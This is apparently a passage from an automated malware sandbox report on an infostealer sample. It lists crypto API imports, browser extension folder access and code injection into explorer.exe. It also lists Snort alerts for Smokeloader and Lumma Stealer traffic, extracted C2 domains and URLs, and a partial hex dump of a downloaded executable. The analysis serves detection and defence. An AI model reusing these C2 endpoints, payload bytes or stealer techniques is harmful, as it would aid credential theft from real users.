Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD8670 PK11_ExportEncryptedPrivKeyInfo,	9_2_6CFD8670
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	9_2_6CFFA650
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D020180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	9_2_6D020180
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF43B0 PK11_PubEncryptPKCS1,PR_SetError,	9_2_6CFF43B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	9_2_6D01BD30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D017C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	9_2_6D017C00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	9_2_6CFD7D60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF3FF0 PK11_PrivDecryptPKCS1,	9_2_6CFF3FF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D019EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	9_2_6D019EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	9_2_6CFF3850
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	9_2_6CFF9840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01DA40 SEC_PKCS7ContentIsEncrypted,	9_2_6D01DA40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D027410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	9_2_6D027410

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Unpacked PE file: 6.2.F441.exe.400000.0.unpack

Uses 32bit PE files

Source: 4.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_00409960
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_00409960
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	6_2_00404970
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	6_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then dec edx	6_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_00417062
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	6_2_00417062
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426174
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	6_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426271
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426284
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	6_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, 00008000h	6_2_00403570
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp cl, 0000002Eh	6_2_00421580
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	6_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	6_2_00414660
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edi, ebx	6_2_00436670
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_00431680
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	6_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h	6_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_00423931
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	6_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	6_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	6_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	6_2_02106248
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then dec edx	6_2_0212B2B7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_021072C9
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	6_2_021072C9
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp cl, 0000002Eh	6_2_021112E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021163DB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_0210D097
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	6_2_0212917C
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	6_2_02106739
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, 00008000h	6_2_020F37D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021164D8
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021164EB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_02100519
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_02106B56
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_02114B47
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_02113B98
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_020F9BC7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_020F9BC7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	6_2_020F4BD7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_02114B47
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	6_2_020F2807
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edi, ebx	6_2_021268D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	6_2_021048C7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_021218E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	6_2_02100918
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	6_2_02123E13
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_020FFE1B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_02113ECF
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_02113EFE
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp dword ptr [004421CCh]	6_2_0210CF1A
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_02115F55
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h]	6_2_02111C89
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_02112D5B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	6_2_02105D61
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_020FCD77

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.4:52163 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52655 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52656 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52658 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52693 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52694 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52695 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52696 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52697 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52698 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52736 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52737 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52738 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52739 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52740 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52741 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52742 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52743 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52744 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52745 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52746 -> 185.18.245.58:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.28.110.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.18.245.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:20:02 GMTConnection: keep-aliveETag: "6652f0b2-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
